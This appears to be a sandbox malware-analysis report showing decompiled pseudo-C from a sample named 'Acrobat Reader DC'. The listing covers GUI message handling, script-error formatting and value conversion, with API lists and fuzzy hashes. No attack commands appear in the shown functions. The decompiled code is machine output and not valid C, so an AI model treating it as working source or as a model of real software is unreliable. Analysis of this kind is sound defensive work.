                                  											 &_v88 = E00432A10(__ecx, __esi,  &_v88, 1, 1);
                                  											__ecx =  &_v88;
                                  											_push( &_v88);
                                  											goto L31;
                                  										case 3:
                                  											L10:
                                  											return _t138 | 0xffffffff;
                                  											goto L70;
                                  										case 4:
                                  											__eax = E00413BED(__esi);
                                  											asm("fnstcw word [ebp+0xa]");
                                  											__eax = _a6 & 0x0000ffff;
                                  											__eax = _a6 & 0x0000ffff | 0x00000c00;
                                  											__eflags = __eax;
                                  											_a12 = __eax;
                                  											__esp = __esp + 4;
                                  											asm("fldcw word [ebp+0x10]");
                                  											asm("fistp qword [ebp-0x1c]");
                                  											__ecx = _v32;
                                  											asm("fldcw word [ebp+0xa]");
                                  											SendMessageW(__edi, 0x402, _v32, 0) = 1;
                                  											return 1;
                                  											goto L70;
                                  										case 5:
                                  											 &_v220 =  *(__ecx + 0x18c);
                                  											_v220 = 1;
                                  											_v208 = __esi;
                                  											__eax = SendMessageW( *(__ecx + 0x18c), 0x133d,  *(__ebx + 0x8b) & 0x000000ff,  &_v220);
                                  											__eflags = __eax;
                                  											if(__eax == 0) {
                                  												goto L13;
                                  											} else {
                                  												__eflags =  *(__ebx + 0x8b) - 0xff;
                                  												if( *(__ebx + 0x8b) == 0xff) {
                                  													goto L69;
                                  												} else {
                                  													__ecx = _a8;
                                  													InvalidateRect( *_a8, 0, 1) = 1;
                                  													return 1;
                                  												}
                                  											}
                                  											goto L70;
                                  										case 6:
                                  											_push(0x208);
                                  											__eax = E004115D7(__edi, __esi, __eflags);
                                  											__ecx = _a4;
                                  											__esp = __esp + 4;
                                  											__edi = __eax;
                                  											__eax =  &_v168;
                                  											_v168.cbSize = 0x30;
                                  											_v168.fMask = 0x10;
                                  											_v168.dwTypeData = __edi;
                                  											_v168.cch = 0x104;
                                  											__eax = GetMenuItemInfoW( *(__ebx + 8), _a4, 0,  &_v168);
                                  											__eflags = __eax;
                                  											if(__eax == 0) {
                                  												L65:
                                  												_push(__edi);
                                  												__eax = E004111DC();
                                  												__esp = __esp + 4;
                                  												__eax = 0;
                                  												__eflags = 0;
                                  												return 0;
                                  											} else {
                                  												__eflags = _v168.fType & 0x00000800;
                                  												if((_v168.fType & 0x00000800) != 0) {
                                  													goto L65;
                                  												} else {
                                  													__ecx = _a4;
                                  													__eax =  &_v168;
                                  													_v168.dwTypeData = __esi;
                                  													__eax = SetMenuItemInfoW( *(__ebx + 8), _a4, 0,  &_v168);
                                  													__eflags = __eax;
                                  													if(__eax == 0) {
                                  														goto L65;
                                  													} else {
                                  														__eax = _a8;
                                  														__ecx =  *_a8;
                                  														__eax = DrawMenuBar( *_a8);
                                  														_push(__edi);
                                  														__eax = E004111DC();
                                  														__esp = __esp + 4;
                                  														__eax = 1;
                                  														return 1;
                                  													}
                                  												}
                                  											}
                                  											goto L70;
                                  										case 7:
                                  											__eax =  *(__ebx + 0xc);
                                  											__ecx =  &_v260;
                                  											_push( &_v260);
                                  											_push(0);
                                  											_push(0x113f);
                                  											_v260 = 1;
                                  											_v256 =  *(__ebx + 0xc);
                                  											_v244 = __esi;
                                  											_push( *(__ebx + 0x30));
                                  											goto L33;
                                  										case 8:
                                  											__eax = E00413BED(__esi);
                                  											__eax = 1;
                                  											return 1;
                                  											goto L70;
                                  										case 9:
                                  											__eflags = __esi;
                                  											if(__esi == 0) {
                                  												goto L10;
                                  											} else {
                                  												__ecx =  &_v120;
                                  												__eax = E00412F40( &_v120, 0, 0x20);
                                  												__ebx = 0;
                                  												__eflags = 0;
                                  												_a4 = __esi;
                                  												while(1) {
                                  													 &_v8456 = E00430626(__eflags,  &_v8456,  &_a4, 0x4a8644);
                                  													__eflags = __al;
                                  													if(__al == 0) {
                                  														break;
                                  													}
                                  													__eflags = _v8456;
                                  													__ecx =  &_v8456;
                                  													_v120 = 4;
                                  													_v108 =  &_v8456;
                                  													if(__eflags == 0) {
                                  														L42:
                                  														__ebx =  &(__ebx->i);
                                  														continue;
                                  													} else {
                                  														__eflags = SendMessageW(__edi, 0x1060, __ebx,  &_v120);
                                  														if(__eflags == 0) {
                                  															goto L13;
                                  														} else {
                                  															goto L42;
                                  														}
                                  													}
                                  													goto L70;
                                  												}
                                  												__eax = E004111C1(__esi);
                                  												__eflags = __eax;
                                  												if(__eax == 0) {
                                  													L45:
                                  													__ecx = _a4;
                                  													_push( &_v120);
                                  													_push(__ebx);
                                  													_v108 = _a4;
                                  													_push(0x1060);
                                  													goto L32;
                                  												} else {
                                  													__eax = E004111C1(__esi);
                                  													__eflags =  *((intOrPtr*)(__esi + __eax * 2 - 2)) -  *0x4a8644;
                                  													if( *((intOrPtr*)(__esi + __eax * 2 - 2)) !=  *0x4a8644) {
                                  														goto L69;
                                  													} else {
                                  														goto L45;
                                  													}
                                  												}
                                  											}
                                  											goto L70;
                                  										case 0xa:
                                  											__ebx =  *(__ebx + 0x30);
                                  											__eflags = __esi;
                                  											if(__esi == 0) {
                                  												goto L10;
                                  											} else {
                                  												 &_v72 = E00412F40( &_v72, 0, 0x28);
                                  												__ecx = _a4;
                                  												__edi = SendMessageW;
                                  												_v192 = 1;
                                  												_v184 = _a4;
                                  												__eax = SendMessageW(__ebx, 0x1053, 0xffffffff,  &_v192);
                                  												_v68 = __eax;
                                  												__eflags = __eax - 0xffffffff;
                                  												if(__eflags == 0) {
                                  													goto L13;
                                  												} else {
                                  													_a12 = 0;
                                  													_a4 = __esi;
                                  													while(1) {
                                  														__eax =  &_a4;
                                  														__ecx =  &_v8456;
                                  														__eax = E00430626(__eflags,  &_v8456,  &_a4, 0x4a8644);
                                  														__eflags = __al;
                                  														if(__al == 0) {
                                  															break;
                                  														}
                                  														__eflags = _v8456;
                                  														__ecx = _a12;
                                  														__eax = 1;
                                  														_v72 = 1;
                                  														_v52 =  &_v8456;
                                  														_v64 = _a12;
                                  														if(__eflags == 0) {
                                  															L53:
                                  															_a12 = _a12 + __eax;
                                  															continue;
                                  														} else {
                                  															__eax = _v68;
                                  															_push( &_v72);
                                  															_push(_v68);
                                  															_push(0x1074);
                                  															_push(__ebx);
                                  															__eax = __edi->i();
                                  															__eflags = _v68;
                                  															if(__eflags == 0) {
                                  																goto L13;
                                  															} else {
                                  																__eax = 1;
                                  																goto L53;
                                  															}
                                  														}
                                  														goto L70;
                                  													}
                                  													__eax = E004111C1(__esi);
                                  													__eflags = __eax;
                                  													if(__eax == 0) {
                                  														L56:
                                  														__eax = _a12;
                                  														__ecx =  &_v72;
                                  														_push( &_v72);
                                  														_v52 = _a4;
                                  														_push(_v68);
                                  														_push(0x1074);
                                  														_push(__ebx);
                                  														_v64 = _a12;
                                  														__eax = __edi->i();
                                  														goto L34;
                                  													} else {
                                  														__eax = E004111C1(__esi);
                                  														__eflags =  *((intOrPtr*)(__esi + __eax * 2 - 2)) -  *0x4a8644;
                                  														if( *((intOrPtr*)(__esi + __eax * 2 - 2)) !=  *0x4a8644) {
                                  															goto L69;
                                  														} else {
                                  															goto L56;
                                  														}
                                  													}
                                  												}
                                  											}
                                  											goto L70;
                                  										case 0xb:
                                  											__eax = E00413BED(__esi);
                                  											 *(__ebx + 0x48) = __eax;
                                  											__eax = 1;
                                  											return 1;
                                  											goto L70;
                                  										case 0xc:
                                  											E00432A10(__ecx, __esi,  &_v88, 1, 1) =  &_v88;
                                  											_push( &_v88);
                                  											L31:
                                  											_push(0);
                                  											_push(0x1002);
                                  											L32:
                                  											_push(__edi);
                                  											L33:
                                  											__eax = SendMessageW();
                                  											L34:
                                  											__eflags = __eax;
                                  											if(__eax != 0) {
                                  												L69:
                                  												return 1;
                                  											} else {
                                  												return __eax;
                                  											}
                                  											goto L70;
                                  										case 0xd:
                                  											goto L66;
                                  									}
                                  								}
                                  								goto L70;
                                  						}
                                  					}
                                  				}
                                  				L70:
                                  			}
































                                  0x0044948b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00449285
                                  0x00000000
                                  0x00000000
                                  0x00449225
                                  0x00449223
                                  0x00000000

                                  APIs
                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                  • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                  • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                  • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$CharNext
                                  • String ID:
                                  • API String ID: 1350042424-0
                                  • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                  • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                  • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                  • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 69%
                                  			E0045E737(void* __fp0, struct HINSTANCE__* _a4, int _a8, intOrPtr _a12) {
                                  				WCHAR* _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				char _v52;
                                  				char _v68;
                                  				WCHAR* _v84;
                                  				short _v8280;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				struct HINSTANCE__* _t51;
                                  				intOrPtr _t96;
                                  				WCHAR* _t100;
                                  				WCHAR* _t118;
                                  				intOrPtr _t119;
                                  				intOrPtr _t129;
                                  				intOrPtr _t131;
                                  				struct HINSTANCE__* _t132;
                                  				void* _t146;
                                  
                                  				_t146 = __fp0;
                                  				_t51 = E00422240(0x2058);
                                  				if( *0x4974e2 == 0) {
                                  					_t51 = _a4;
                                  					_t138 =  *((intOrPtr*)(_t51 + 0xf8)) - 1;
                                  					if( *((intOrPtr*)(_t51 + 0xf8)) != 1) {
                                  						LoadStringW( *0x497520, 0x66,  &_v8280, 0xfff);
                                  						_t118 =  &_v8280;
                                  						E00401B10(_t118,  &_v84, _t138);
                                  						_t111 =  *0x497520;
                                  						LoadStringW( *0x497520, _a8, _t118, 0xfff);
                                  						E00401B10(_t118,  &_v68, _t138);
                                  						_t129 =  *((intOrPtr*)(_a4 + 0xf4));
                                  						_v36 = E004348DE(_t129);
                                  						_t119 = E004348AA(_t129);
                                  						_v28 = _t119;
                                  						_t96 = E00434908(E0043492F(_t129));
                                  						_v32 = _t96;
                                  						_t100 =  &_v8280;
                                  						_t139 = _t96;
                                  						if(_t96 == 0) {
                                  							_t111 = _a4;
                                  							_push( *((intOrPtr*)(_a4 + 0xc8)));
                                  							_push(_t129);
                                  						} else {
                                  							_push(_t96);
                                  							_push(_t119);
                                  						}
                                  						_push(L"Line %d  (File \"%s\"):\n\n");
                                  						_push(_t100);
                                  						E0041329B(_t111);
                                  						E00401B10( &_v8280,  &_v24, _t139);
                                  						_t131 = _v36;
                                  						_t140 = _t131;
                                  						if(_t131 != 0) {
                                  							E0040D200( &_v24, _t100, _t131, _t146);
                                  							E0040D200( &_v24, _t100, "\n", _t146);
                                  						}
                                  						_t101 =  &_v52;
                                  						E0040BC70( &_v52, _t140);
                                  						_t121 = _a12;
                                  						if(_a12 >= 0) {
                                  							E0040C600(E00402160( &_v52, _t131, _t111, _t121) | 0xffffffff,  &_v52, _t121);
                                  							E0040D200( &_v52,  &_v52, L"^ ERROR", _t146);
                                  							E0040BD50( &_v24, _t146,  &_v52);
                                  							E0040D200( &_v24,  &_v52, "\n", _t146);
                                  							_t96 = _v32;
                                  						}
                                  						E0040D200( &_v24, _t101, L"\nError: ", _t146);
                                  						E0040BD50( &_v24, _t146,  &_v68);
                                  						if( *0x4974e8 == 0) {
                                  							MessageBoxW( *0x497518, _v24, _v84, 0x11010);
                                  							goto L14;
                                  						} else {
                                  							_t144 = _t96;
                                  							if(_t96 == 0) {
                                  								_t132 = _a4;
                                  								_push(_v68);
                                  								_push( *((intOrPtr*)(_t132 + 0xf4)));
                                  								_push( *((intOrPtr*)(_t132 + 0xc8)));
                                  								_push(L"%s (%d) : ==> %s:\n");
                                  								E00413ABE(_t96, _v68, L"\nError: ", _t132, __eflags);
                                  								L15:
                                  								 *((intOrPtr*)(_t132 + 0xf8)) = 1;
                                  								if( *((char*)(_t132 + 0x118)) == 0) {
                                  									 *0x4974f4 = 1;
                                  								} else {
                                  									 *0x4974f4 = _a8 + 0x7ffff000;
                                  								}
                                  								E00402250( &_v52);
                                  								E00402250( &_v24);
                                  								E00402250( &_v68);
                                  								return E00402250( &_v84);
                                  							}
                                  							_push(_v52);
                                  							_push(_t131);
                                  							_push(_v68);
                                  							_push(_v28);
                                  							_push(_t96);
                                  							_push(L"%s (%d) : ==> %s:\n%s\n%s\n");
                                  							E00413ABE(_t96, _v52, L"\nError: ", _t131, _t144);
                                  							L14:
                                  							_t132 = _a4;
                                  							goto L15;
                                  						}
                                  					}
                                  				}
                                  				return _t51;
                                  			}

                                  APIs
                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                  • __swprintf.LIBCMT ref: 0045E7F7
                                  • _wprintf.LIBCMT ref: 0045E8B3
                                  • _wprintf.LIBCMT ref: 0045E8D7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                  • API String ID: 2295938435-2354261254
                                  • Opcode ID: 44e01960a33580a095bbf2e3e13559187395cafc70d58b6b713acd2f3f366ced
                                  • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                  • Opcode Fuzzy Hash: 44e01960a33580a095bbf2e3e13559187395cafc70d58b6b713acd2f3f366ced
                                  • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E004531B1(intOrPtr* _a4) {
                                  				char _v20;
                                  				char _v152;
                                  				intOrPtr _t30;
                                  				signed int _t31;
                                  				intOrPtr* _t38;
                                  
                                  				_t38 = _a4;
                                  				_t30 =  *((intOrPtr*)(_t38 + 8));
                                  				if(_t30 == 4) {
                                  					return _t30;
                                  				} else {
                                  					_t31 = _t30 - 1;
                                  					if(_t31 > 0xa) {
                                  						L17:
                                  						_v152 = 0;
                                  						goto L18;
                                  					} else {
                                  						switch( *((intOrPtr*)(_t31 * 4 +  &M00453385))) {
                                  							case 0:
                                  								E0041305C( *_t38,  &_v152, 0xa);
                                  								_t50 = _t50 + 0xc;
                                  								goto L18;
                                  							case 1:
                                  								__eax =  *(__ebx + 4);
                                  								__ecx =  *__ebx;
                                  								_t7 =  &_v152; // -148
                                  								__edx = _t7;
                                  								__eax = E00413109( *__ebx,  *(__ebx + 4), _t7, 0xa);
                                  								goto L18;
                                  							case 2:
                                  								__esp = __esp - 8;
                                  								 *__esp =  *__ebx;
                                  								_t8 =  &_v152; // -148
                                  								__edx = _t8;
                                  								_push(L"%.15g");
                                  								_push(__edx);
                                  								__eax = E0041329B(__edx);
                                  								__esp = __esp + 0x10;
                                  								goto L18;
                                  							case 3:
                                  								goto L17;
                                  							case 4:
                                  								__eax =  *__ebx;
                                  								_t9 =  &_v152; // -148
                                  								__ecx = _t9;
                                  								__eax = E0041329B(__edx, _t9, L"0x%p",  *__ebx);
                                  								goto L18;
                                  							case 5:
                                  								__eflags =  *__ebx;
                                  								if( *__ebx == 0) {
                                  									_t11 =  &_v152; // -148
                                  									_t11 = E00411567(_t11, L"False");
                                  								} else {
                                  									_t10 =  &_v152; // -148
                                  									__edx = _t10;
                                  									__eax = E00411567(_t10, L"True");
                                  								}
                                  								goto L18;
                                  							case 6:
                                  								__edx =  *__ebx;
                                  								_t12 =  &_v20; // -16
                                  								__ecx = _t12;
                                  								E0044B3F6( *__ebx, _t12) =  *__eax;
                                  								_t13 =  &_v152; // -148
                                  								__ecx = _t13;
                                  								__eax = E00411567(_t13, __eax);
                                  								_t14 =  &_v20; // -16
                                  								__ecx = _t14;
                                  								__eax = E00402250(_t14);
                                  								L18:
                                  								E00403D80(_t38);
                                  								_push(0x10);
                                  								_t33 = E004115D7(_t41, _t38, _t53);
                                  								_t54 = _t33;
                                  								if(_t33 == 0) {
                                  									__eflags = 0;
                                  									 *((intOrPtr*)(_t38 + 0xc)) = 0;
                                  									return 0;
                                  								}
                                  								_t35 = E00401B10( &_v152, _t33, _t54);
                                  								 *((intOrPtr*)(_t38 + 0xc)) = _t35;
                                  								return _t35;
                                  								goto L22;
                                  							case 7:
                                  								__edx =  *__ebx;
                                  								__esi =  *( *__ebx);
                                  								__ecx = 0;
                                  								__eax = 6 + __esi * 4;
                                  								2 = __eax * 2 >> 0x20;
                                  								__eax = __eax * 2;
                                  								0 | __eflags > 0x00000000 =  ~(__eflags > 0);
                                  								__ecx =  ~(__eflags > 0) | __eax;
                                  								_push( ~(__eflags > 0) | __eax);
                                  								__edi = E004115D7(__edi, __esi, __eflags);
                                  								__eax =  *__ebx;
                                  								__esp = __esp + 4;
                                  								__eflags =  *__eax;
                                  								if( *__eax == 0) {
                                  									__eax = 0;
                                  									__eflags = 0;
                                  									 *__edi = __ax;
                                  								} else {
                                  									__ecx =  *__eax;
                                  									__edx =  *(__eax + 4);
                                  									__eax = E00432DFC( *(__eax + 4), __edi,  *__eax);
                                  								}
                                  								__esi = __ebx;
                                  								__eax = E00403D80(__esi);
                                  								_push(0x10);
                                  								__eax = E004115D7(__edi, __esi, __eflags);
                                  								__esp = __esp + 4;
                                  								__eflags = __eax;
                                  								if(__eflags == 0) {
                                  									__eax = 0;
                                  									__eflags = 0;
                                  									_push(__edi);
                                  									 *(__ebx + 0xc) = 0;
                                  									__eax = E004111DC();
                                  									__esp = __esp + 4;
                                  									_pop(__edi);
                                  									_pop(__esi);
                                  									return __eax;
                                  								} else {
                                  									__esi = __eax;
                                  									__eax = E00401B10(__edi, __eax, __eflags);
                                  									_push(__edi);
                                  									 *(__ebx + 0xc) = __eax;
                                  									__eax = E004111DC();
                                  									__esp = __esp + 4;
                                  									_pop(__edi);
                                  									_pop(__esi);
                                  									return __eax;
                                  								}
                                  								goto L22;
                                  						}
                                  					}
                                  				}
                                  				L22:
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __swprintf_wcscpy$__i64tow__itow
                                  • String ID: %.15g$0x%p$False$True
                                  • API String ID: 3038501623-2263619337
                                  • Opcode ID: 9e50b87208696871976aec561e59ab744ba77687bdac14840efb02e890edfc0f
                                  • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                  • Opcode Fuzzy Hash: 9e50b87208696871976aec561e59ab744ba77687bdac14840efb02e890edfc0f
                                  • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E0045E538(void* __fp0, struct HINSTANCE__* _a4, intOrPtr _a8) {
                                  				intOrPtr _v8;
                                  				WCHAR* _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				char _v48;
                                  				char _v64;
                                  				WCHAR* _v80;
                                  				short _v8276;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				struct HINSTANCE__* _t48;
                                  				WCHAR* _t57;
                                  				intOrPtr _t92;
                                  				WCHAR* _t110;
                                  				intOrPtr _t111;
                                  				intOrPtr _t120;
                                  				intOrPtr _t122;
                                  				struct HINSTANCE__* _t123;
                                  				void* _t136;
                                  
                                  				_t136 = __fp0;
                                  				_t48 = E00422240(0x2054);
                                  				if( *0x4974e2 == 0) {
                                  					_t48 = _a4;
                                  					_t129 =  *((intOrPtr*)(_t48 + 0xf8)) - 1;
                                  					if( *((intOrPtr*)(_t48 + 0xf8)) != 1) {
                                  						LoadStringW( *0x497520, 0x66,  &_v8276, 0xfff);
                                  						_t110 =  &_v8276;
                                  						E00401B10(_t110,  &_v80, _t129);
                                  						_t95 =  *0x497520;
                                  						LoadStringW( *0x497520, 0x72, _t110, 0xfff);
                                  						E00401B10(_t110,  &_v64, _t129);
                                  						_t105 = _a4;
                                  						_t120 =  *((intOrPtr*)(_a4 + 0xf4));
                                  						_v8 = E004348DE(_t120);
                                  						_t111 = E004348AA(_t120);
                                  						_v28 = _t111;
                                  						_t92 = E00434908(E0043492F(_t120));
                                  						_v32 = _t92;
                                  						_t57 =  &_v8276;
                                  						_t130 = _t92;
                                  						if(_t92 == 0) {
                                  							_t95 = _a4;
                                  							_t105 =  *((intOrPtr*)(_t95 + 0xc8));
                                  							_push( *((intOrPtr*)(_t95 + 0xc8)));
                                  							_push(_t120);
                                  						} else {
                                  							_push(_t92);
                                  							_push(_t111);
                                  						}
                                  						_push(L"Line %d  (File \"%s\"):\n\n");
                                  						_push(_t57);
                                  						E0041329B(_t105);
                                  						E00401B10( &_v8276,  &_v24, _t130);
                                  						_t122 = _v8;
                                  						_t131 = _t122;
                                  						if(_t122 != 0) {
                                  							E0040D200( &_v24, _t95, _t122, _t136);
                                  							E0040D200( &_v24, _t95, "\n", _t136);
                                  						}
                                  						_t96 =  &_v48;
                                  						E0040BC70( &_v48, _t131);
                                  						_t113 = _a8;
                                  						if(_a8 != 0) {
                                  							E00402160( &_v48, L"^ ERROR ", _t105, _t113);
                                  							E0040D200( &_v48,  &_v48, _t113, _t136);
                                  							_t96 =  &_v48;
                                  							E0040BD50( &_v24, _t136,  &_v48);
                                  							E0040D200( &_v24,  &_v48, "\n", _t136);
                                  							_t92 = _v32;
                                  						}
                                  						E0040D200( &_v24, _t96, L"\nError: ", _t136);
                                  						E0040BD50( &_v24, _t136,  &_v64);
                                  						if( *0x4974e8 == 0) {
                                  							MessageBoxW( *0x497518, _v24, _v80, 0x11010);
                                  							goto L14;
                                  						} else {
                                  							_t134 = _t92;
                                  							if(_t92 == 0) {
                                  								_t123 = _a4;
                                  								_push(_v64);
                                  								_push( *((intOrPtr*)(_t123 + 0xf4)));
                                  								_push( *((intOrPtr*)(_t123 + 0xc8)));
                                  								_push(L"%s (%d) : ==> %s:\n");
                                  								E00413ABE(_t92,  *((intOrPtr*)(_t123 + 0xc8)), L"\nError: ", _t123, __eflags);
                                  								L15:
                                  								asm("sbb eax, eax");
                                  								 *((intOrPtr*)(_t123 + 0xf8)) = 1;
                                  								 *0x4974f4 = ( ~( *(_t123 + 0x118) & 0x000000ff) & 0x7ffff071) + 1;
                                  								E00402250( &_v48);
                                  								E00402250( &_v24);
                                  								E00402250( &_v64);
                                  								return E00402250( &_v80);
                                  							}
                                  							_push(_v48);
                                  							_push(_t122);
                                  							_push(_v64);
                                  							_push(_v28);
                                  							_push(_t92);
                                  							_push(L"%s (%d) : ==> %s:\n%s\n%s\n");
                                  							E00413ABE(_t92, _v28, L"\nError: ", _t122, _t134);
                                  							L14:
                                  							_t123 = _a4;
                                  							goto L15;
                                  						}
                                  					}
                                  				}
                                  				return _t48;
                                  			}

























                                  APIs
                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                  • __swprintf.LIBCMT ref: 0045E5F6
                                  • _wprintf.LIBCMT ref: 0045E6A3
                                  • _wprintf.LIBCMT ref: 0045E6C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                  • API String ID: 2295938435-8599901
                                  • Opcode ID: 97ebc5a5c228c2a30bddf96a7da616a93a1f5c8b5e746e323a0bc296dbc3a2d1
                                  • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                  • Opcode Fuzzy Hash: 97ebc5a5c228c2a30bddf96a7da616a93a1f5c8b5e746e323a0bc296dbc3a2d1
                                  • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00443B61(void* __edx, long* _a4) {
                                  				void* __esi;
                                  				void* _t5;
                                  				struct HWND__* _t8;
                                  				struct HWND__* _t9;
                                  				struct HWND__* _t12;
                                  				struct HWND__* _t18;
                                  				long* _t22;
                                  				struct HWND__* _t24;
                                  				void* _t25;
                                  				struct HWND__* _t26;
                                  				struct HWND__* _t27;
                                  				long _t28;
                                  				long _t29;
                                  				struct HWND__* _t30;
                                  				void* _t35;
                                  
                                  				_t25 = __edx;
                                  				_t29 = timeGetTime();
                                  				if( *0x4974ef == 0) {
                                  					L12:
                                  					return 0;
                                  				} else {
                                  					_t22 = _a4;
                                  					while(1) {
                                  						_t5 = E0040C620(_t29);
